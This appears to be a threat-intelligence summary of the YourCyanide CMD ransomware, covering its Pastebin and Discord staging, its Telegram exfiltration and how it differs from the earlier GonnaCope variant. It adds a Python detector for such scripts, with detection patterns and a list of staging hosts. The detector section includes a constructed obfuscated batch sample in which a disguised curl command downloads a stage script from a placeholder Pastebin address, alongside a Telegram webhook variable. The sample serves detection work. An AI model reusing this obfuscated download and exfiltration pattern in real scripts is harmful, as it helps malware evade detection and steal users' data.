
YourCyanide: Latest CMD-Based Ransomware with Advanced Capabilities

Trend Micro has been analyzing a family of CMD-based ransomware variants with sophisticated features. YourCyanide is the latest of these variants, in a line that started with GonnaCope.

Diving into details

  • YourCyanide integrates Pastebin, Microsoft documents, and Discord links as part of its payload download mechanism.
  • The ransomware uses multiple obfuscation layers, relying on custom environment variables and the CMD EnableDelayedExpansion feature, to evade detection.
  • To hide its activities, it runs through a chain of intermediate files, fetching each successive stage via Pastebin and Discord before finally downloading the final payload.
  • Because the ransomware is still under active development, it does not yet encrypt anything.
  • It uses the Telegram bot API to exfiltrate stolen information, storing the endpoint in a variable named ‘webhook’.
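As an added defender-side example (not code from the Trend Micro analysis or from Cyware), the following Python scores a .bat/.cmd body for the traits listed above: EnableDelayedExpansion, heavy use of custom environment variables and substring character picking, and download or exfiltration links to Pastebin, Discord and the Telegram bot API. The sample scripts are constructed for illustration and the hostnames are generic service domains, not indicators from the report.

```python
import re

# Indicators taken from the write-up above: multi-layer CMD obfuscation (custom
# environment variables, EnableDelayedExpansion, substring character picking) and
# staging/exfil services (Pastebin, Discord, Telegram bot API). The host names are
# generic service domains, not indicators of compromise from the report.
STAGING_HOSTS = ("pastebin.com", "discord.com", "discordapp.com", "api.telegram.org")
SET_RE = re.compile(r'^\s*set\s+"?([A-Za-z_][A-Za-z0-9_]*)\s*=', re.I | re.M)
DELAYED_REF_RE = re.compile(r'![A-Za-z_][A-Za-z0-9_]*(?::~-?\d+(?:,-?\d+)?)?!')
SUBSTRING_RE = re.compile(r'[%!][A-Za-z_][A-Za-z0-9_]*:~-?\d+(?:,-?\d+)?[%!]')
URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.I)


def score_batch_script(text: str) -> dict:
    """Score a .bat/.cmd body for the obfuscation and staging traits described above."""
    delayed = re.search(r'setlocal\s+enabledelayedexpansion', text, re.I) is not None
    custom_vars = {m.group(1).lower() for m in SET_RE.finditer(text)}
    substring_refs = len(SUBSTRING_RE.findall(text))   # %v:~3,1% style single-char picks
    delayed_refs = len(DELAYED_REF_RE.findall(text))   # !var! references resolved late
    urls = URL_RE.findall(text)
    hosts = sorted({h for u in urls for h in STAGING_HOSTS if h in u.lower()})
    telegram_bot = "api.telegram.org/bot" in text.lower()
    webhook_var = "webhook" in custom_vars
    score = (int(delayed) + 2 * int(substring_refs >= 10) + int(len(custom_vars) >= 5)
             + len(hosts) + 2 * int(telegram_bot) + int(webhook_var))
    return {"delayed_expansion": delayed, "custom_vars": len(custom_vars),
            "substring_refs": substring_refs, "delayed_refs": delayed_refs,
            "staging_hosts": hosts, "telegram_bot": telegram_bot,
            "webhook_var": webhook_var, "score": score, "suspicious": score >= 4}


# Constructed sample modelled on the described techniques; not real YourCyanide code.
SAMPLE = r"""@echo off
setlocal EnableDelayedExpansion
set "a=abcdefghijklmnopqrstuvwxyz"
set "b=https://pastebin.com/raw/PLACEHOLDER"
set "c=https://cdn.discordapp.com/attachments/PLACEHOLDER/stage2.bat"
set "webhook=https://api.telegram.org/botPLACEHOLDER/sendMessage"
set "d=%a:~2,1%%a:~20,1%%a:~17,1%%a:~11,1%"
set "e=!a:~15,1!!a:~14,1!!a:~22,1!!a:~4,1!!a:~17,1!!a:~18,1!!a:~7,1!!a:~4,1!!a:~11,1!!a:~11,1!"
!d! -s -o %TEMP%\n.bat "!b!"
"""

# Constructed benign admin script for contrast.
BENIGN = r"""@echo off
set "LOGDIR=%USERPROFILE%\logs"
if not exist "%LOGDIR%" mkdir "%LOGDIR%"
echo %DATE% %TIME% >> "%LOGDIR%\run.log"
"""
```

The constructed sample scores 10 (suspicious) while the benign script scores 0; the thresholds are illustrative and should be tuned against a corpus of known-good scripts before use in detection.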

Why this matters

  • While no encryption is performed, YourCyanide renames files, which is still disruptive to users.
  • Moreover, the ransomware is still being developed, and its developers are finalizing the encryption routine.
  • It can propagate via email and to other drives.

Variant comparison

  • The earliest version of YourCyanide, dubbed GonnaCope, was first spotted in April.
  • One prominent difference between the two variants is that GonnaCope does not harvest user credentials from a list of applications and web browsers, and does not enable RDP connections.
  • The earliest version also does not execute black.bat, the file responsible for making the machine temporarily inaccessible while the payload runs.

The bottom line

CMD-based ransomware strains are using heavily obfuscated scripts, resulting in low detection rates. While the technique is not new, multi-layered obfuscation lets the malware hide easily. Ransomware strains with advanced capabilities are gaining popularity among cybercriminals. While YourCyanide has not emerged as a serious threat yet, further developments need to be tracked and blocked before they cause severe repercussions.
Cyware Publisher